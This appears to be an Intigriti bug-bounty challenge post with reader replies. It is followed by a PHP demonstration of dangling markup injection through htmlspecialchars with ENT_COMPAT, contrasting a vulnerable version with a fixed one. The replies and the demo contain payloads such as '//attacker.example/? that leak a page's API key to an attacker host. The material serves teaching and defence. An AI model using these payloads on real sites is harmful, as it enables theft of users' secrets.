Can you spot the vulnerability? 🔎

Show us how you'd steal your victim's API key in the comments 👇

The best explanation gets a 25€ SWAG voucher!🎫

📜 Want to play around with the snippet?
Here's the code 👇

https://gist.github.com/PinkDraconian/7060e82ae97ffd1aca30337416e7b0af

Spot The Vulnerability 29-12-2022

@Intigriti Phishing link with modified icon parameter. Inject additional attributes into the link element, as space is probably not disallowed by htmlspecialchars. Without reading the docs I don't know what else.
@Intigriti onload or another JS code attribute with a BeEF hook, probably.
@phurd We've tried for quite a while to get JS attributes to work on link tags in the latest Chrome versions, but failed. Any chance you could provide a PoC of one that works?
There's something else here 😉
@Intigriti The ENT_COMPAT flag is used in the call to htmlspecialchars for $_GET['icon'], so single quotes are left unescaped (https://www.php.net/manual/en/function.htmlspecialchars.php). This means it's vulnerable to dangling markup injection (https://portswigger.net/web-security/cross-site-scripting/dangling-markup), and as there's no single quote in the HTML until after the insertion point of $api_key (assuming no single quote in key?), a query parameter of e.g. ?icon=%27//attacker.com? would send everything in the HTML up to next single quote to attacker, including the key?
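The dangling-markup leak described in the last comment, as an added example that is not the gist's code. The exact layout of the original snippet is not visible here, so this version assumes what the comment implies: the `icon` parameter is escaped with `ENT_COMPAT` and lands where a leading single quote can open an attribute value, and the API key is echoed into the HTML further down with no single quote in between. The function names, the `attacker.example` host and the placeholder key are all made up for the demonstration.

```php
<?php
// Added example, not the gist's code. Page layout assumed from the thread:
// the icon parameter is written into an unquoted attribute value after
// htmlspecialchars(..., ENT_COMPAT), and an API key is echoed into a later
// <script> block with no single quote anywhere in between.

const API_KEY = 'sk_test_0000EXAMPLE'; // constructed placeholder, not a real key

// Vulnerable: ENT_COMPAT encodes & < > and " but leaves ' untouched. Because the
// template does not quote the attribute itself, an attacker-supplied leading '
// is read by the HTML tokenizer as the opening delimiter of a single-quoted
// attribute value, which then runs until the next ' anywhere in the page.
function render_vulnerable(string $icon): string
{
    $safe = htmlspecialchars($icon, ENT_COMPAT, 'UTF-8');
    return "<link rel=icon href={$safe}>\n"
         . "<script>const apiKey = \"" . API_KEY . "\";</script>\n"
         . "<p>Don't share your key.</p>\n";
}

// Hardened: quote the attribute in the template and use ENT_QUOTES so that the
// delimiter (') is encoded as &#039; and can no longer terminate or open a value.
function render_fixed(string $icon): string
{
    $safe = htmlspecialchars($icon, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<link rel=\"icon\" href=\"{$safe}\">\n"
         . "<script>const apiKey = \"" . API_KEY . "\";</script>\n"
         . "<p>Don't share your key.</p>\n";
}

// The payload from the thread: a quote followed by a URL whose query is left open.
$payload = "'//attacker.example/?";

echo "--- vulnerable ---\n", render_vulnerable($payload);
// Rendered: <link rel=icon href='//attacker.example/?>
//           <script>const apiKey = "sk_test_0000EXAMPLE";</script>
//           <p>Don't share your key.</p>
// The browser's href for the icon is everything from //attacker.example/? up to
// the ' in "Don't": the closing >, the whole <script> line including the key,
// and "<p>Don". The URL parser drops the newlines and percent-encodes the rest,
// so the favicon request carries the key to attacker.example. The <script> is
// swallowed into the attribute and never runs, which is why no JS execution is
// needed and why an onload-style payload was a dead end.

echo "--- fixed ---\n", render_fixed($payload);
// Rendered: <link rel="icon" href="&#039;//attacker.example/?">
// Double-quoting alone would already have stopped this particular payload
// (ENT_COMPAT does encode "), but ENT_QUOTES removes the dependency on which
// delimiter the template happens to use, and quoting every attribute removes
// the unquoted-value case where any leading ' or " is interpreted as a delimiter.
```

Run it with `php example.php` and compare the two `<link>` lines; to see the leak in a browser, serve the vulnerable variant and watch the request log of the host you control for the `/?%3E%3Cscript%3E...` favicon fetch. A CSP `img-src`/`default-src` that excludes untrusted origins also blocks the exfiltration, but the escaping fix is the one that removes the bug.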